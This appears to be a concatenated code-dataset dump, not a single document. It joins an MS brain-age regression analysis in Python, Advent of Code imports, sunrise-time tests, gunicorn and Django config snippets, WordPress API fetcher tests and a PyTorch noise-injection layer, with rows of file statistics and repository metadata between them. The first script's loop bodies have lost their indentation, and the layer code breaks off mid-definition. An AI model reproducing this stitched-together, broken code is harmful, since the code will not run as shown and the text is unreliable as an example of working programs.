cortical_mat_ms2_t1, age_ms2, subs, _ = load_dataset(dataset, cortical_parc='midgray',
measure_type='r1')
NUM_REPS = 1000
X = data_t1.T
youngsters = np.where(y_t1<=AGE)
y_old = np.delete(y_t1, youngsters)
data_old = np.delete(X, youngsters, axis=0)
data_old = np.delete(data_old, np.where(areas_notdeg2==1), axis=1)
#df_pca, X_pca, pca_evr, df_corr, df_n, df_na, df_nabv, df_rank = pca_full_report(X=data_old, features_=np.delete(areas, np.where(areas_notdeg2==1)), save_plot=False, fig_dpi=50)
adults = np.where(y_t1>AGE)
y_young = np.delete(y_t1, adults)
data_young = np.delete(X, adults, axis=0)
data_young = np.delete(data_young, np.where(areas_notdeg2==1), axis=1)
#df_pca, X_pca, pca_evr, df_corr, df_n, df_na, df_nabv, df_rank = pca_full_report(X=data_young, features_=np.delete(areas, np.where(areas_notdeg2==1)), save_plot=False, fig_dpi=50)
#prepare a range of parameters to test
alphas = np.array([1,])
l1_ratio=np.array([0.9])
#create and fit a ridge regression model, testing each alpha
model = linear_model.ElasticNet() #We have chosen to just normalize the data by default, you could GridsearchCV this is you wanted
grid = GridSearchCV(estimator=model, param_grid=dict(alpha=alphas, l1_ratio=l1_ratio))
grid.fit(data_old, y_old)
# summarize the results of the grid search
# we want 30 features
grid.best_estimator_.alpha=0.01
grid.best_estimator_.l1_ratio=0.9999
lm = linear_model.ElasticNet(alpha=grid.best_estimator_.alpha, l1_ratio=grid.best_estimator_.l1_ratio)
error_old = np.zeros(NUM_REPS)
error_old_lim = np.zeros(NUM_REPS)
error_old_tot = np.empty((data_old.shape[0],NUM_REPS))
error_old_tot[:] = np.nan
indices = np.arange(data_old.shape[0])
for idx in range(NUM_REPS):
X_train, X_test, y_train, y_test_old, idx1, idx2 = train_test_split(data_old, y_old, indices)
lm.fit(X_train, y_train)
y_pred = lm.predict(X_test)
error_old[idx] = metrics.mean_absolute_error(y_test_old, y_pred)
error_old_tot[idx2,idx] = y_pred
error_old_lim[idx] = np.mean(y_test_old - y_pred)
mean_pred_old = np.nanmean(error_old_tot, axis=1)
np.mean(error_old)
#print(np.count_nonzero(lm.coef_))
#
#plt.scatter(mean_pred_old, y_old)
#plt.plot(range(15,100),range(15,100))
#plt.xlabel("predicted age")
#plt.ylabel("real age")
cortical_mat_ms1_t1 = np.delete(cortical_mat_ms1_t1, np.where(areas_notdeg2==1), axis=0)
cortical_mat_ms2_t1 = np.delete(cortical_mat_ms2_t1, np.where(areas_notdeg2==1), axis=0)
error_ms = np.zeros(NUM_REPS)
error_ms_lim = np.zeros(NUM_REPS)
error_ms1_tot = np.empty((cortical_mat_ms1_t1.shape[1],NUM_REPS))
error_ms1_tot[:] = np.nan
error_ms2_tot = np.empty((cortical_mat_ms2_t1.shape[1],NUM_REPS))
error_ms2_tot[:] = np.nan
indices = np.arange(cortical_mat_ms1_t1.shape[1])
for idx in range(NUM_REPS):
X_train, X_test, y_train, y_test = train_test_split(data_old, y_old)
lm.fit(X_train, y_train)
y_pred_ms1 = lm.predict(cortical_mat_ms1_t1.T)
y_pred_ms2 = lm.predict(cortical_mat_ms2_t1.T)
error_ms[idx] = np.mean((metrics.mean_absolute_error(y_pred_ms1, age_ms1), metrics.mean_absolute_error(y_pred_ms2, age_ms2)))
error_ms_lim[idx] = np.mean((np.mean(y_pred_ms1 - age_ms1), np.mean(y_pred_ms2 - age_ms2)))
error_ms1_tot[:,idx] = y_pred_ms1
error_ms2_tot[:,idx] = y_pred_ms2
mean_pred_ms1 = np.nanmean(error_ms1_tot, axis=1)
mean_pred_ms2 = np.nanmean(error_ms2_tot, axis=1)
np.mean(error_ms)
# we want 28 features
# we want 27 features without reading
grid.best_estimator_.alpha=0.0055
grid.best_estimator_.l1_ratio=0.999
lm = linear_model.ElasticNet(alpha=grid.best_estimator_.alpha, l1_ratio=grid.best_estimator_.l1_ratio)
error_young = np.zeros(NUM_REPS)
error_young_lim = np.zeros(NUM_REPS)
error_young_tot = np.empty((data_young.shape[0],NUM_REPS))
error_young_tot[:] = np.nan
indices = np.arange(data_young.shape[0])
for idx in range(NUM_REPS):
X_train, X_test, y_train, y_test_young, idx1, idx2 = train_test_split(data_young, y_young, indices)
lm.fit(X_train, y_train)
y_pred = lm.predict(X_test)
error_young[idx] = metrics.mean_absolute_error(y_test_young, y_pred)
error_young_lim[idx] = np.mean(y_test_young - y_pred)
error_young_tot[idx2,idx] = y_pred
mean_pred_young = np.nanmean(error_young_tot, axis=1)
#print(np.mean(error_young))
#print(np.count_nonzero(lm.coef_))
#
#plt.scatter(mean_pred_young, y_young)
#plt.plot(range(15,100),range(15,100))
#plt.xlabel("predicted age")
#plt.ylabel("real age")
plt.scatter(mean_pred_old, y_old)
plt.plot(range(15,100),range(15,100))
plt.xlabel("predicted age")
plt.ylabel("real age")
plt.scatter(np.hstack((mean_pred_ms1)), np.hstack((age_ms1)))
plt.plot(range(15,100),range(15,100))
plt.xlabel("predicted age")
plt.ylabel("real age ms")
plt.title("Age prediction ElasticNet")
plt.scatter(mean_pred_young, y_young)
plt.plot(range(15,100),range(15,100))
plt.xlabel("predicted age")
plt.ylabel("real age")
plt.scatter(np.hstack(( mean_pred_ms2)), np.hstack(( age_ms2)), c='orange', edgecolors='k')
plt.plot(range(15,100),range(15,100))
plt.xlabel("predicted age")
plt.ylabel("real age ms")
plt.xlim(0,100)
plt.title("Age prediction ElasticNet R1")
plt.savefig('./reports/figures/rebuttal/ms_no_lesions//R1_elastic_net25_mean.eps', format='eps')
sns.distplot(error_young, color='green', label="Young")
sns.distplot(error_old, color='blue', label="Adult")
sns.distplot(error_ms, color='orange', label="MS")
plt.legend()
plt.ylim(0,1.5)
plt.xlim(0,16)
plt.savefig('./reports/figures/rebuttal/ms_no_lesions/R1_en_errordist_abs.svg', format='svg')
plt.close()
sns.distplot(error_young_lim, color='green', label="Young")
sns.distplot(error_old_lim, color='blue', label="Adult")
sns.distplot(error_ms_lim, color='orange', label="MS")
plt.legend()
plt.ylim(0,0.7)
plt.xlim(-7.5,12.5)
plt.savefig('./reports/figures/rebuttal/ms_no_lesions//R1_en_errordist.svg', format='svg')
plt.close()
np.mean(error_young), np.mean(error_old), np.mean(error_ms), np.mean(error_young_lim), np.mean(error_old_lim), np.mean(error_ms_lim)
(3.8088678955607644,
9.922678403744369,
11.746312199338734,
-0.10584176177057543,
0.8343678259753887,
7.079538257465861)
error_young_en_r1 = mean_pred_young - y_young
error_old_en_r1 = mean_pred_old - y_old
error_ms_en_r1_1 = mean_pred_ms1
error_ms_en_r1_2 = mean_pred_ms2
"""
PCA
"""
"""
R1
"""
data_t1, y_t1, subs_t1 = load_cort(measure = 'r1', cort='midgray')
dataset = 'stanford_ms_run1'
cortical_mat_ms1_t1, age_ms1, subs, _ = load_dataset(dataset, cortical_parc='midgray',
measure_type='r1')
dataset = 'stanford_ms_run2'
cortical_mat_ms2_t1, age_ms2, subs, _ = load_dataset(dataset, cortical_parc='midgray',
measure_type='r1')
NUM_REPS = 1000
X = data_t1.T
youngsters = np.where(y_t1<=AGE)
y_old = np.delete(y_t1, youngsters)
data_old = np.delete(X, youngsters, axis=0)
data_old = np.delete(data_old, np.where(areas_notdeg2==1), axis=1)
#df_pca, X_pca, pca_evr, df_corr, df_n, df_na, df_nabv, df_rank = pca_full_report(X=data_old, features_=np.delete(areas, np.where(areas_notdeg2==1)), save_plot=False, fig_dpi=50)
adults = np.where(y_t1>AGE)
y_young = np.delete(y_t1, adults)
data_young = np.delete(X, adults, axis=0)
data_young = np.delete(data_young, np.where(areas_notdeg2==1), axis=1)
#df_pca, X_pca, pca_evr, df_corr, df_n, df_na, df_nabv, df_rank = pca_full_report(X=data_young, features_=np.delete(areas, np.where(areas_notdeg2==1)), save_plot=False, fig_dpi=50)
NUM_PCS = 30 # pca_idx
pca = PCA(n_components=NUM_PCS)
lm = linear_model.LinearRegression()
error_old = np.zeros(NUM_REPS)
error_old_lim = np.zeros(NUM_REPS)
error_old_tot = np.empty((data_old.shape[0], NUM_REPS))
error_old_tot[:] = np.nan
indices = np.arange(data_old.shape[0])
for idx in range(NUM_REPS):
X_train, X_test, y_train, y_test_old, idx1, idx2 = train_test_split(data_old, y_old, indices)
X_train_pca = pca.fit_transform(X_train)
X_test_pca = pca.transform(X_test)
lm.fit(X_train_pca, y_train)
y_pred = lm.predict(X_test_pca)
error_old[idx] = metrics.mean_absolute_error(y_test_old, y_pred)
error_old_lim[idx] = np.mean(y_test_old - y_pred)
error_old_tot[idx2,idx] = y_pred
mean_pred_old = np.nanmean(error_old_tot, axis=1)
np.mean(error_old)
X_ms1 = cortical_mat_ms1_t1.T
X_ms2 = cortical_mat_ms2_t1.T
X_ms1 = np.delete(X_ms1, np.where(areas_notdeg2==1), axis=1)
X_ms2 = np.delete(X_ms2, np.where(areas_notdeg2==1), axis=1)
error_ms = np.zeros(NUM_REPS)
error_ms_lim = np.zeros(NUM_REPS)
error_ms1_tot = np.empty((10, NUM_REPS))
error_ms1_tot[:] = np.nan
error_ms2_tot = np.empty((10, NUM_REPS))
error_ms2_tot[:] = np.nan
indices = np.arange(cortical_mat_ms1_t1.shape[0])
for idx in range(NUM_REPS):
X_train, X_test, y_train, y_test_old = train_test_split(data_old, y_old)
X_train_pca = pca.fit_transform(X_train)
X_test_pca_ms1 = pca.transform(X_ms1)
X_test_pca_ms2 = pca.transform(X_ms2)
lm.fit(X_train_pca, y_train)
y_pred_ms1 = lm.predict(X_test_pca_ms1)
y_pred_ms2 = lm.predict(X_test_pca_ms2)
error_ms[idx] = np.mean((metrics.mean_absolute_error(y_pred_ms1, age_ms1), metrics.mean_absolute_error(y_pred_ms2, age_ms2)))
error_ms_lim[idx] = np.mean((np.mean(y_pred_ms1 - age_ms1), np.mean(y_pred_ms2 - age_ms2)))
error_ms1_tot[:,idx] = y_pred_ms1
error_ms2_tot[:,idx] = y_pred_ms2
mean_pred_ms1 = np.nanmean(error_ms1_tot, axis=1)
mean_pred_ms2 = np.nanmean(error_ms2_tot, axis=1)
np.mean(error_ms)
# we want 27 features without reading
NUM_PCS = 27 # pca_idx
pca = PCA(n_components=NUM_PCS)
error_young = np.zeros(NUM_REPS)
error_young_lim = np.zeros(NUM_REPS)
error_young_tot = np.empty((data_young.shape[0], NUM_REPS))
error_young_tot[:] = np.nan
indices = np.arange(data_young.shape[0])
for idx in range(NUM_REPS):
X_train, X_test, y_train, y_test_young, idx1, idx2 = train_test_split(data_young, y_young, indices)
X_train_pca = pca.fit_transform(X_train)
X_test_pca = pca.transform(X_test)
lm.fit(X_train_pca, y_train)
y_pred = lm.predict(X_test_pca)
error_young[idx] = metrics.mean_absolute_error(y_test_young, y_pred)
error_young_lim[idx] = np.mean(y_test_young - y_pred)
error_young_tot[idx2,idx] = y_pred
mean_pred_young = np.nanmean(error_young_tot, axis=1)
np.mean(error_young)
plt.scatter(mean_pred_old, y_old)
plt.plot(range(15,100),range(15,100))
plt.xlabel("predicted age")
plt.ylabel("real age")
plt.scatter(np.hstack((mean_pred_ms1)), np.hstack((age_ms1)))
plt.plot(range(15,100),range(15,100))
plt.xlabel("predicted age")
plt.ylabel("real age ms")
plt.scatter(mean_pred_young, y_young)
plt.plot(range(15,100),range(15,100))
plt.xlabel("predicted age")
plt.ylabel("real age")
plt.scatter(np.hstack(( mean_pred_ms2)), np.hstack(( age_ms2)), c='orange', edgecolors='k')
plt.plot(range(15,100),range(15,100))
plt.xlabel("predicted age")
plt.ylabel("real age ms")
plt.xlim(0,100)
plt.title("Age prediction PCA R1")
plt.savefig('./reports/figures/rebuttal/ms_no_lesions//R1_pca25_mean.eps', format='eps')
plt.close()
sns.distplot(error_young, color='green', label="Young")
sns.distplot(error_old, color='blue', label="Adult")
sns.distplot(error_ms, color='orange', label="MS")
plt.legend()
plt.ylim(0,1.5)
plt.xlim(0,16)
plt.savefig('./reports/figures/rebuttal/ms_no_lesions//R1_pca_errordist_abs.svg', format='svg')
plt.close()
sns.distplot(error_young_lim, color='green', label="Young")
sns.distplot(error_old_lim, color='blue', label="Adult")
sns.distplot(error_ms_lim, color='orange', label="MS")
plt.legend()
plt.ylim(0,0.7)
plt.xlim(-7.5,15)
plt.savefig('./reports/figures/rebuttal/ms_no_lesions//R1_pca_errordist.svg', format='svg')
plt.close()
np.mean(error_young), np.mean(error_old), np.mean(error_ms), np.mean(error_young_lim), np.mean(error_old_lim), np.mean(error_ms_lim)
(3.9012972628040763,
9.596348494134515,
11.718228063461774,
-0.015885939316919354,
0.5549219781979086,
7.7544336037910035)
error_young_pca_r1 = mean_pred_young - y_young
error_old_pca_r1 = mean_pred_old - y_old
error_ms_pca_r1_1 = mean_pred_ms1
error_ms_pca_r1_2 = mean_pred_ms2
# Section marker. The original used four quote characters (""""), which is a
# syntax error (it opens a triple-quoted string and leaves a stray quote);
# fixed to proper triple-quoted strings.
"""
statistics
"""
from scipy.stats import ttest_ind  # two-sample t-test for cohort comparisons

# True ages for the two MS scan sessions, used as references in the t-tests below.
y_ms_1 = age_ms1
y_ms_2 = age_ms2
"""
ms stats
"""
# Compare signed age-prediction errors of healthy adults vs. MS patients
# (session 1, PCA model) with an independent two-sample t-test; the p-value
# is embedded in the saved figure filename.
# error_old_pca_r1[idx_healthy_old_ms]
t, p = ttest_ind(error_old_pca_r1[idx_healthy_old_ms_1], error_ms_pca_r1_1 - y_ms_1) # np.delete(error_ms_pca_r1_1, [1,4]) - np.delete(y_ms_1, [1,4]) # removing outliers, still significant
sns.boxplot(data=[error_old_pca_r1[idx_healthy_old_ms_1] , error_ms_pca_r1_1 - y_ms_1], color='orange')
plt.savefig('./reports/figures/rebuttal/ms_no_lesions//old_r1_ms1_stats_pca_' + str(p) + '.svg', format='svg')
plt.close()
# Same comparison for MS session 2 (PCA model).
# error_old_pca_r1[idx_healthy_old_ms]
t, p = ttest_ind(error_old_pca_r1[idx_healthy_old_ms_2], error_ms_pca_r1_2 - y_ms_2)
sns.boxplot(data=[error_old_pca_r1[idx_healthy_old_ms_2] , error_ms_pca_r1_2 - y_ms_2], color='orange')
plt.savefig('./reports/figures/rebuttal/ms_no_lesions//old_r1_ms2_stats_pca_' + str(p) + '.svg', format='svg')
plt.close()
# Same comparisons for the elastic-net ("en") model, sessions 1 and 2.
# error_old_en_r1[idx_healthy_old_ms]
t, p = ttest_ind(error_old_en_r1[idx_healthy_old_ms_1], error_ms_en_r1_1 - y_ms_1) # np.delete(error_ms_en_r1_1, [1,4]) - np.delete(y_ms_1, [1,4]) # removing outliers, still significant
sns.boxplot(data=[error_old_en_r1[idx_healthy_old_ms_1] , error_ms_en_r1_1 - y_ms_1], color='orange')
plt.savefig('./reports/figures/rebuttal/ms_no_lesions//old_r1_ms1_stats_en_' + str(p) + '.svg', format='svg')
plt.close()
# error_old_en_r1[idx_healthy_old_ms]
t, p = ttest_ind(error_old_en_r1[idx_healthy_old_ms_2], error_ms_en_r1_2 - y_ms_2)
sns.boxplot(data=[error_old_en_r1[idx_healthy_old_ms_2] , error_ms_en_r1_2 - y_ms_2], color='orange')
plt.savefig('./reports/figures/rebuttal/ms_no_lesions//old_r1_ms2_stats_en_' + str(p) + '.svg', format='svg')
plt.close()
| 38.0798
| 188
| 0.731631
| 2,719
| 15,270
| 3.770504
| 0.10445
| 0.031213
| 0.02341
| 0.02224
| 0.862076
| 0.829692
| 0.809208
| 0.792626
| 0.769216
| 0.76112
| 0
| 0.060795
| 0.126392
| 15,270
| 400
| 189
| 38.175
| 0.707721
| 0.117682
| 0
| 0.65529
| 0
| 0
| 0.089814
| 0.047354
| 0
| 0
| 0
| 0
| 0
| 0
| null | null | 0
| 0.03413
| null | null | 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
339217ea41d133c1c8709d60fdba6df716eb8538
| 130
|
py
|
Python
|
solutions/day9/solver.py
|
NunoMCSilva/My-Advent-of-Code-2017-Solutions
|
df818a2f7a733834d352b8fabcd340d75de8c0b1
|
[
"MIT"
] | null | null | null |
solutions/day9/solver.py
|
NunoMCSilva/My-Advent-of-Code-2017-Solutions
|
df818a2f7a733834d352b8fabcd340d75de8c0b1
|
[
"MIT"
] | null | null | null |
solutions/day9/solver.py
|
NunoMCSilva/My-Advent-of-Code-2017-Solutions
|
df818a2f7a733834d352b8fabcd340d75de8c0b1
|
[
"MIT"
] | null | null | null |
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
from solutions.day9.solver1 import part1
from solutions.day9.solver2 import part2
| 21.666667
| 40
| 0.738462
| 19
| 130
| 5.052632
| 0.789474
| 0.270833
| 0.354167
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.070175
| 0.123077
| 130
| 5
| 41
| 26
| 0.77193
| 0.330769
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 7
|
d501e3a8dda91b49207a6b76eda6e0b3534948e8
| 1,878
|
py
|
Python
|
solarblinds2/tests/test_events.py
|
lalten/solar-blinds-2
|
5dc9155b1ca582a4b12e6928c4f1641d7ffe7a81
|
[
"MIT"
] | null | null | null |
solarblinds2/tests/test_events.py
|
lalten/solar-blinds-2
|
5dc9155b1ca582a4b12e6928c4f1641d7ffe7a81
|
[
"MIT"
] | null | null | null |
solarblinds2/tests/test_events.py
|
lalten/solar-blinds-2
|
5dc9155b1ca582a4b12e6928c4f1641d7ffe7a81
|
[
"MIT"
] | null | null | null |
import datetime
from solarblinds2.events import get_next_sun_event_time_and_type
import astral
import solarblinds2.config
def test_get_next_sun_event_time_and_type_happy() -> None:
    """Jan 1st 2000: sunrise is the next event before noon, sunset after noon."""
    utc = datetime.timezone.utc
    observer = astral.Observer()

    # Query at midnight: the next event should be the morning sunrise.
    event_time, event_type = get_next_sun_event_time_and_type(
        observer, datetime.datetime(year=2000, month=1, day=1, hour=0, tzinfo=utc))
    assert event_time == datetime.datetime(2000, 1, 1, 8, 5, 57, 311165, tzinfo=utc)
    assert event_type == solarblinds2.config.EventType.SUNRISE

    # Query at noon: the next event should be the evening sunset.
    event_time, event_type = get_next_sun_event_time_and_type(
        observer, datetime.datetime(year=2000, month=1, day=1, hour=12, tzinfo=utc))
    assert event_time == datetime.datetime(2000, 1, 1, 16, 0, 49, 698951, tzinfo=utc)
    assert event_type == solarblinds2.config.EventType.SUNSET
def test_get_next_sun_event_time_and_type_close_to_event() -> None:
    """Boundary behaviour: at exactly the event time, the *following* event is returned."""
    utc = datetime.timezone.utc
    observer = astral.Observer()
    sunrise = datetime.datetime(2000, 1, 1, 8, 5, 57, 311165, tzinfo=utc)
    sunset = datetime.datetime(2000, 1, 1, 16, 0, 49, 698951, tzinfo=utc)
    one_us = datetime.timedelta(microseconds=1)

    # One microsecond before sunrise: sunrise is still upcoming.
    event_time, event_type = get_next_sun_event_time_and_type(observer, sunrise - one_us)
    assert event_time == sunrise
    assert event_type == solarblinds2.config.EventType.SUNRISE

    # Exactly at sunrise: it no longer counts as upcoming; sunset is next.
    event_time, event_type = get_next_sun_event_time_and_type(observer, sunrise)
    assert event_time == sunset
    assert event_type == solarblinds2.config.EventType.SUNSET

    # One microsecond after sunrise: still sunset.
    event_time, event_type = get_next_sun_event_time_and_type(observer, sunrise + one_us)
    assert event_time == sunset
    assert event_type == solarblinds2.config.EventType.SUNSET
| 49.421053
| 97
| 0.740149
| 282
| 1,878
| 4.737589
| 0.159574
| 0.11976
| 0.164671
| 0.187126
| 0.926647
| 0.926647
| 0.926647
| 0.868263
| 0.868263
| 0.818862
| 0
| 0.096333
| 0.143237
| 1,878
| 37
| 98
| 50.756757
| 0.733996
| 0
| 0
| 0.607143
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.357143
| 1
| 0.071429
| false
| 0
| 0.142857
| 0
| 0.214286
| 0
| 0
| 0
| 0
| null | 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
1d1b44670f2306f8549db3134853beb5d488da2d
| 21
|
py
|
Python
|
config/prod.py
|
TenPennyTV/flask-ffmpeg
|
476e20bb682b60c76dff2b8bc1c7980b9c5a47f7
|
[
"MIT"
] | null | null | null |
config/prod.py
|
TenPennyTV/flask-ffmpeg
|
476e20bb682b60c76dff2b8bc1c7980b9c5a47f7
|
[
"MIT"
] | null | null | null |
config/prod.py
|
TenPennyTV/flask-ffmpeg
|
476e20bb682b60c76dff2b8bc1c7980b9c5a47f7
|
[
"MIT"
] | null | null | null |
# Gunicorn bind address for production: listen on all interfaces, port 8090.
bind = "0.0.0.0:8090"
| 21
| 21
| 0.571429
| 6
| 21
| 2
| 0.5
| 0.5
| 0.5
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.421053
| 0.095238
| 21
| 1
| 21
| 21
| 0.210526
| 0
| 0
| 0
| 0
| 0
| 0.545455
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| null | 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 1
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
1d9d93a9ff1fa1ce796347478b936cd62e563b34
| 116
|
py
|
Python
|
andorra/settings/staging.py
|
TheProrok29/andorra
|
895ac07a85e8dc36f21a74f77312adc73fded459
|
[
"MIT"
] | null | null | null |
andorra/settings/staging.py
|
TheProrok29/andorra
|
895ac07a85e8dc36f21a74f77312adc73fded459
|
[
"MIT"
] | 4
|
2020-06-07T10:23:51.000Z
|
2021-09-22T19:09:32.000Z
|
andorra/settings/staging.py
|
TheProrok29/andorra
|
895ac07a85e8dc36f21a74f77312adc73fded459
|
[
"MIT"
] | null | null | null |
# Staging settings: start from the development settings and let django-heroku
# patch in Heroku-specific configuration (database URL, static files, logging).
# flake8: noqa
import django_heroku
from .development import *
# test_runner=False keeps the project's own test runner instead of Heroku's.
django_heroku.settings(locals(), test_runner=False)
| 19.333333
| 51
| 0.801724
| 15
| 116
| 6
| 0.8
| 0.266667
| 0.4
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.009615
| 0.103448
| 116
| 5
| 52
| 23.2
| 0.855769
| 0.103448
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 0.666667
| 0
| 0.666667
| 0
| 1
| 0
| 0
| null | 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 7
|
d5491be816d0758a508c5bf81c463d7d56b6b3fe
| 4,122
|
py
|
Python
|
testapp/wagtail_wordpress_importer/test/api_fetcher_tests.py
|
nickmoreton/wagtail_wordpress_importer
|
fbe6b60ae624edac3f42a62ce30af4a0c548b4ed
|
[
"MIT"
] | null | null | null |
testapp/wagtail_wordpress_importer/test/api_fetcher_tests.py
|
nickmoreton/wagtail_wordpress_importer
|
fbe6b60ae624edac3f42a62ce30af4a0c548b4ed
|
[
"MIT"
] | null | null | null |
testapp/wagtail_wordpress_importer/test/api_fetcher_tests.py
|
nickmoreton/wagtail_wordpress_importer
|
fbe6b60ae624edac3f42a62ce30af4a0c548b4ed
|
[
"MIT"
] | null | null | null |
from django.test import SimpleTestCase
from wagtail_wordpress_importer.cls.api_fetcher import WordpressApiFetcher
class ApiFetcherTestCase(SimpleTestCase):
    """Exercise WordpressApiFetcher's header parsing against the live
    NHS England WordPress API, for both the main site and the /aac subsite.

    Each check is factored into a private helper that takes the URL, so the
    main-site and subsite tests share one code path.
    """

    def _check_page_headers(self, base_url):
        """Fetching page 1 must yield a JSON content type and positive totals."""
        fetcher = WordpressApiFetcher(base_url=base_url)
        self.assertEqual(fetcher.content_type,
                         'application/json; charset=UTF-8')
        self.assertGreater(fetcher.total_results, 0)
        self.assertGreater(fetcher.total_pages, 0)

    def _check_link_header_chain(self, url_prefix):
        """Walk the Link-header pagination chain rooted at url_prefix + page number."""
        page1 = url_prefix + '1'
        page2 = url_prefix + '2'
        page3 = url_prefix + '3'
        # page 1: has a next link, no previous link
        fetcher = WordpressApiFetcher(base_url=page1)
        self.assertEqual(fetcher.next_url, page2)
        self.assertEqual(fetcher.prev_url, None)
        # page 2: linked both ways
        fetcher = WordpressApiFetcher(base_url=page2)
        self.assertEqual(fetcher.next_url, page3)
        self.assertEqual(fetcher.prev_url, page1)
        # last page: has a previous link, no next link
        last_page = WordpressApiFetcher(base_url=page1).total_pages
        fetcher = WordpressApiFetcher(base_url=url_prefix + str(last_page))
        self.assertEqual(fetcher.next_url, None)
        self.assertEqual(fetcher.prev_url, url_prefix + str(last_page - 1))

    def test_get_page_headers(self):
        self._check_page_headers(
            'https://www.england.nhs.uk/wp-json/wp/v2/pages?page=1')

    def test_parse_headers_link(self):
        self._check_link_header_chain(
            'https://www.england.nhs.uk/wp-json/wp/v2/pages?page=')

    def test_get_page_headers_subsite(self):
        self._check_page_headers(
            'https://www.england.nhs.uk/aac/wp-json/wp/v2/pages?page=1')

    def test_parse_headers_link_subsite(self):
        self._check_link_header_chain(
            'https://www.england.nhs.uk/aac/wp-json/wp/v2/pages?page=')
| 40.411765
| 96
| 0.665454
| 558
| 4,122
| 4.666667
| 0.102151
| 0.119048
| 0.103687
| 0.124424
| 0.942012
| 0.925883
| 0.925883
| 0.925883
| 0.925883
| 0.925883
| 0
| 0.013639
| 0.21737
| 4,122
| 101
| 97
| 40.811881
| 0.793552
| 0.011402
| 0
| 0.613333
| 0
| 0.24
| 0.259651
| 0
| 0
| 0
| 0
| 0
| 0.24
| 1
| 0.053333
| false
| 0
| 0.026667
| 0
| 0.093333
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
d5744170a3aaaf1946c976b300943d14b46ef9eb
| 5,141
|
py
|
Python
|
cnns/nnlib/robustness/pni/code/models/noise_layer_both.py
|
anonymous-user-commits/perturb-net
|
66fc7c4a1234fa34b92bcc85751f0a6e23d80a23
|
[
"MIT"
] | null | null | null |
cnns/nnlib/robustness/pni/code/models/noise_layer_both.py
|
anonymous-user-commits/perturb-net
|
66fc7c4a1234fa34b92bcc85751f0a6e23d80a23
|
[
"MIT"
] | null | null | null |
cnns/nnlib/robustness/pni/code/models/noise_layer_both.py
|
anonymous-user-commits/perturb-net
|
66fc7c4a1234fa34b92bcc85751f0a6e23d80a23
|
[
"MIT"
] | null | null | null |
import torch.nn as nn
import math
import torch.nn.functional as F
import torch
import numpy as np
# Which noise to inject by default: perturb weights, inputs, or both.
global_noise_type = 'both'


class noise_Linear(nn.Linear):
    """nn.Linear with learnable-scale Gaussian noise injected into its weights
    and/or inputs (parametric noise injection)."""

    def __init__(self, in_features, out_features, bias=True, pni='layerwise',
                 w_noise=True, noise_type=global_noise_type, input_size=None):
        """
        :param in_features: size of each input sample
        :param out_features: size of each output sample
        :param bias: add a learnable bias term
        :param pni: noise-scale granularity: 'layerwise', 'channelwise' or
            'elementwise'
        :param w_noise: enables the noise term (False zeroes it out)
        :param noise_type: weight or input or both
        :param input_size: shape of the input noise scale, required only for
            pni='elementwise'
        """
        super(noise_Linear, self).__init__(in_features, out_features, bias)
        self.pni = pni
        self.noise_type = noise_type
        # Fixed: the original compared strings with `is`, which depends on
        # CPython string interning and is not guaranteed to work; use `==`.
        if self.pni == 'layerwise':
            # One scalar noise scale for the whole layer.
            # noise scale for weights
            if self.noise_type in ('weight', 'both'):
                self.alpha_w = nn.Parameter(torch.Tensor([0.25]),
                                            requires_grad=True)
            # noise scale for inputs
            if self.noise_type in ('input', 'both'):
                self.alpha_i = nn.Parameter(torch.Tensor([0.25]),
                                            requires_grad=True)
        elif self.pni == 'channelwise':
            # One scale per output feature (weights) / input feature (inputs).
            self.alpha_w = nn.Parameter(
                torch.ones(self.out_features).view(-1, 1) * 0.25,
                requires_grad=True)
            # NOTE(review): shape (in_features, 1) broadcasts against a
            # (batch, in_features) input only when batch == in_features —
            # confirm the intended shape.
            self.alpha_i = nn.Parameter(
                torch.ones(self.in_features).view(-1, 1) * 0.25,
                requires_grad=True)
        elif self.pni == 'elementwise':
            self.alpha_w = nn.Parameter(torch.ones(self.weight.size()) * 0.25,
                                        requires_grad=True)
            self.alpha_i = nn.Parameter(torch.ones(input_size) * 0.25,
                                        requires_grad=True)
        self.w_noise = w_noise

    def forward(self, input):
